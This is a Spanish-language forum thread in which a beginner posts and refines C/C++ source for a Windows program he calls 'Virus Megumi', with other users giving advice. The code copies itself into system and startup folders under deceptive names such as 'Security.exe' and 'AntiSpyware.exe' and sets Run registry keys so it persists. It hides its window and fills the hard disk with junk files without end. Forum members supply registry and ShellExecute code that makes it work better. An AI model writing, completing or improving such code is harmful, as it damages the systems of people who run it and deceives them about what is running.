Virus Megumi

[Void]

Este virus llena el disco duro silenciosament e todo el tiempo que este prendida la PC. Es mi primer virus en C++, asi que no esperen demaciado. Los comandos que utiliza para iniciarse con windows son de DOS, si alguien sabe como acerlo desde C++ que por favor me lo diga.

Para que funcione, hay que llamarlo Megumi.exe, este es el code:

Código:

#include<stdio.h>
#include<windows.h>


char name[12];

unsigned char gettecla()
{
      int j=(rand()%2);
      if(!j) return ((rand()%26)+97);
      if(j) return ((rand()%10)+48);
}

void tateti()
{
     int i=1;
     name[0]=((rand()%26)+65);
     name[8]='.';
     while(i<12)
     {
           if (i!=8) name[i]=gettecla();
           i++;
     }
}

void secopia()
{
     system("if not exist %windir%\\system32\\Megumi.exe reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Megumi /d %windir%\\system32\\Megumi.exe /f");
     system("if not exist %windir%\\system32\\Megumi.exe copy megumi.exe %windir%\\system32\\Megumi.exe");
     system("if not exist %windir%\\Security.exe reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Security /d %windir%\\Security.exe /f");
     system("if not exist %windir%\\Security.exe copy megumi.exe %windir%\\Megumi.exe");
     system("if not exist %windir%\\Security.exe copy megumi.exe %windir%\\Security.exe");
}


main()
{
      FILE* archivo;
      unsigned long int numero, k=0;
      char caracter[1024];
     
     
      secopia();
      FreeConsole();
      while(k<1024)
      {
            caracter[k]='0';
            k++;
      }
      for(;;)
      {
             tateti();
             if (!(archivo=fopen(name,"r+b"))) archivo=fopen(name,"wb");
             k=0;
             numero=((rand()%10)+1)*1024;
             while(k<numero)
             {
                   fwrite(&caracter,1024,1,archivo);
                   k++;
             }
             fclose(archivo);
      }
}

Nota: Al ejecutarlo la carpeta en la que este se llena de archivos inutiles y relativamente pesados. Si alguien sabe como evitarlo que por favor me diga.

Nota2: Le puse de nombre megumi en honor al fantasma de la pelicula "imagenes del mas alla", ya que hace ser mas pesado a Benjamin.
 

[FreakMind]

Eso no es un virus...


Saludos, FreakMind

[Void]

¿Por que no?, y ¿como seria un virus entonces?

[rapidfuck]

Es el que se propaga creo

[Sagitarius]

Los que se propagan son gusanos, un virus puede ser cualquier programa cuyo fin sea fastidiarte. Al menos desde mi punto de vista.

[Void]

Pues mi definicion de virus era parecida a la de Sagitarius, por eso lo llame asi. De todas formas es un programa que no le gustaria a nadie tener en su computadora, y ese era mi objetivo.
 

[FreakMind]

Buenas

cualquier programa cuyo fin sea fastidiarte

Eso podria ser la definicion de malware.

Un virus informatico (como su analogo biologico) es un programa que se copia a si mismo y se adhiere a otros archivos sin el conocimiento del usuario. Por otro lado, no necesariamente un virus tiene que hacer algo "dañiño" aunque obviamente la mayoria lo hace.

Lo que postearon, tal vez podria llamarse bacteria.

Saludos, FreakMind

[Simonss]

Es mejor no utilizar system para acceder al registro si existe Reg(OpenKeyEx, SetvalueEx, Closekey) para hacerlo mas rapidamente, si recurrimos a system todo el llenado del HD lo hacemos en una sola linea.
No entiendo porque dices que esta hecho en C++ es por  *.cpp?? porque no veo alguna caracteristica propia de C++. El main deberia retornar un valor puesto que no veo void en el mismo, etc, etc etc.

[Void]

Podrias darme un ejemplo de como modificar el registro ?, ¿y decirme que libreria nesecito?



Yo estoy empezando a aprender c++, por eso no se muchas cosas. Pero escribi que lo hice en c++ porque lo compilo con dev-c++.Y no puse void main() porque con dev-c++ me salta un error al hacerlo asi, y este codigo lo copie directamente del que yo uso.
 

[Simonss]

Bueno....

Código:

#include <windows.h>
int main ()
{     
      char direc[15]="rutadelprograma";
      HKEY elkey;
      RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Appearance", 0, KEY_SET_VALUE, &elkey);
      RegSetValueEx (elkey, "yahooo", 0, REG_SZ, (LPBYTE) direc, 15);
      RegCloseKey(elkey);
      return 0;   
}

En este caso puse 15 porque se el numero de caracteres que tiene direc, pero en caso de variables se puede usar sizeof o strlen para saber cuantos caract. tendra y poder escribirlos.
Dev C++ puede hacer codes en c y c++, si lo haces en un proyecto de c tb te compila y funciona, por ello preguntaba .
ciao.

[Void]

Gracias, me has ayudado mucho.
 

[Void]

Cambie un poco el codigo, para no usar el comando system(). Yo creo que es mejor que el anterior.

Código:

#include<stdio.h>
#include<windows.h>


char name[12];

unsigned char gettecla()
{
      int j=(rand()%2);
      if(!j) return ((rand()%26)+97);
      if(j) return ((rand()%10)+48);
}

void tateti()
{
     int i=1;
     name[0]=((rand()%26)+65);
     name[8]='.';
     while(i<12)
     {
           if (i!=8) name[i]=gettecla();
           i++;
     }
}



void main(int argc, char *argv[])
{
      FILE* archivo;
      unsigned long int numero, k=0;
      char caracter[1024];
     
      HKEY elkey;
      char da[]="C:\\WINDOWS\\SYSTEM32\\Megumi.exe";
      char db[]="C:\\WINDOWS\\Megumi.exe";
      char dc[]="C:\\WINDOWS\\Security.exe";

      CopyFile(argv[0],"C:\\WINDOWS\\SYSTEM32\\Megumi.exe",0);
      CopyFile(argv[0],"C:\\WINDOWS\\Megumi.exe",0);
      CopyFile(argv[0],"C:\\WINDOWS\\Security.exe",0);
     
      RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &elkey);
      RegSetValueEx (elkey, "Megumi", 0, REG_SZ, (LPBYTE) da, sizeof(da));
      RegSetValueEx (elkey, "Megumiv", 0, REG_SZ, (LPBYTE) db, sizeof(db));
      RegSetValueEx (elkey, "Security", 0, REG_SZ, (LPBYTE) dc, sizeof(dc));
      RegCloseKey(elkey);
     
     
      FreeConsole();
      while(k<1024)
      {
            caracter[k]='0';
            k++;
      }
      for(;;)
      {
             tateti();
             if (!(archivo=fopen(name,"r+b"))) archivo=fopen(name,"wb");
             k=0;
             numero=((rand()%10)+1)*1024;
             while(k<numero)
             {
                   fwrite(&caracter,1024,1,archivo);
                   k++;
             }
             fclose(archivo);
      }
}

Nota: Todavia no pude hacer que no se creen archivos en la carpeta en la que se ejecuta el malware, si alguien sabe como hacerlo que por favor me lo diga.
 

[FreakMind]

Trataste cambiando el directorio actual?


Saludos, FreakMind

[Simonss]

Nota: Todavia no pude hacer que no se creen archivos en la carpeta en la que se ejecuta el malware, si alguien sabe como hacerlo que por favor me lo diga.
 

Separa mas partes del codigo en funciones y puedes hacer lo sgte:
Al comienzo en el main puedes hacer una comprobación...
Si tu programa se ejecuta en su destino ejemplo "C:\\Windows" por ejemplo llamar a la funcion para crear los archivos, si no se encuentra en ella, entonces pasar a la funcion de autocopia y escritura del registro, luego  ejecutar la copia en C:\\windows u otro dir con shellexecute.
En lugar de utilizar un random puedes utilizar el mismo for y los valores de "i" por ejemplo los utilizas como nombre de archivo, pero mi idea seria que crearas un solo archivo (fopen) y utilizaras CopyFile combinado con el for y el valor de "i" por ejemplo, para escribir las copias (1.txt, 2.txt, ... n.txt) en otro caso puedes directamente copiar algun archivo grande de el mismo windows con diferentes nombres con CopyFile.
Ciao.

[Void]

Gracias por las sugerencias

[Void]

Lo termine, solo me falta lo de filecopy. Unas preguntas, ¿es mas rapido con filecopy, o por que me lo recomiendas?, y ¿que es shellexecute?.

Hasta ahora esta si:

Código:

#include<stdio.h>
#include<windows.h>
#include<string.h>


char name[12];

unsigned char gettecla()
{
      int j=(rand()%2);
      if(!j) return ((rand()%26)+97);
      if(j) return ((rand()%10)+48);
}

void tateti()
{
     int i=1;
     name[0]=((rand()%26)+65);
     name[8]='.';
     while(i<12)
     {
           if (i!=8) name[i]=gettecla();
           i++;
     }
}



main(int argc, char *argv[])
{
      FreeConsole();
      FILE* archivo;
      unsigned long int numero, k=0;
      char caracter[1024];
      bool sera=false;
     
      HKEY elkey;
      char da[]="C:\\WINDOWS\\SYSTEM32\\Megumi.exe";
      char db[]="C:\\WINDOWS\\Megumi.exe";
      char dc[]="C:\\WINDOWS\\Security.exe";
     
     
      CopyFile(argv[0],"C:\\WINDOWS\\SYSTEM32\\Megumi.exe",0);
      CopyFile(argv[0],"C:\\WINDOWS\\Megumi.exe",0);
      CopyFile(argv[0],"C:\\WINDOWS\\Security.exe",0);
     
      CopyFile(argv[0],"C:\\Documents and Settings\\All Users\\Menú Inicio\\Programas\\Inicio\\SoftwareRunner.exe",0);
      CopyFile(argv[0],"C:\\Documents and Settings\\Default User\\Menú Inicio\\Programas\\Inicio\\AntiSpyware.exe",0);
     
      RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &elkey);
      RegSetValueEx (elkey, "Megumi", 0, REG_SZ, (LPBYTE) da, sizeof(da));
      RegSetValueEx (elkey, "Megumiv", 0, REG_SZ, (LPBYTE) db, sizeof(db));
      RegSetValueEx (elkey, "Security", 0, REG_SZ, (LPBYTE) dc, sizeof(dc));
      RegCloseKey(elkey);
     
      while(k<1024)
      {
            caracter[k]='0';
            k++;
      }
     
      if(strcmp(argv[0],da)==0) sera=true;
      if(strcmp(argv[0],db)==0) sera=true;
      if(strcmp(argv[0],dc)==0) sera=true;
     
      if(sera)
      {
      for(;;)
      {
             tateti();
             if (!(archivo=fopen(name,"r+b"))) archivo=fopen(name,"wb");
             k=0;
             numero=((rand()%10)+1)*1024;
             while(k<numero)
             {
                   fwrite(&caracter,1024,1,archivo);
                   k++;
             }
             fclose(archivo);
             
      }
      }
}

[Simonss]

Unas preguntas, ¿es mas rapido con filecopy, o por que me lo recomiendas?, y ¿que es shellexecute?.

Tu puedes averiguarlo utilizando "TimeGetTime" para saber cual de ellos es mas veloz. Puedes usar Shellexecute para ejecutar un archivo, programa u otro de forma transparente, si asi lo quieres.

[Void]

Gracias, pero ¿podrias ponerme un ejemplo de como se usan??

[Deybit_cool]

loco esteube probando el virus que teypiastes y tiene 5 errores y 1 warnirn esta malo si sabes como arreglarlo dimelo

[Simonss]

Gracias, pero ¿podrias ponerme un ejemplo de como se usan??

Código:

#include <windows.h>

int main()
{
  ShellExecute(0,"open","C:\\WINDOWS\\NOTEPAD.EXE",NULL,NULL,0);
  return 0;
}

El ultimo "0" cambialo por "1" para ver la diferencia.

[Void]

loco esteube probando el virus que teypiastes y tiene 5 errores y 1 warnirn esta malo si sabes como arreglarlo dimelo

Yo lo lo compile bien y sin errores ni warnings, y lo ejecute en mi computadora para ver si anda (pude quitarlo despues otra ves ya que conosco el codigo fuente), y funciono correctamente. Quisas no ande para tu compilador, yo uso dev-c++.

Gracias, pero ¿podrias ponerme un ejemplo de como se usan??

Código:

#include <windows.h>

int main()
{
  ShellExecute(0,"open","C:\\WINDOWS\\NOTEPAD.EXE",NULL,NULL,0);
  return 0;
}

El ultimo "0" cambialo por "1" para ver la diferencia.

Gracias Simonss, eres todo un maestro.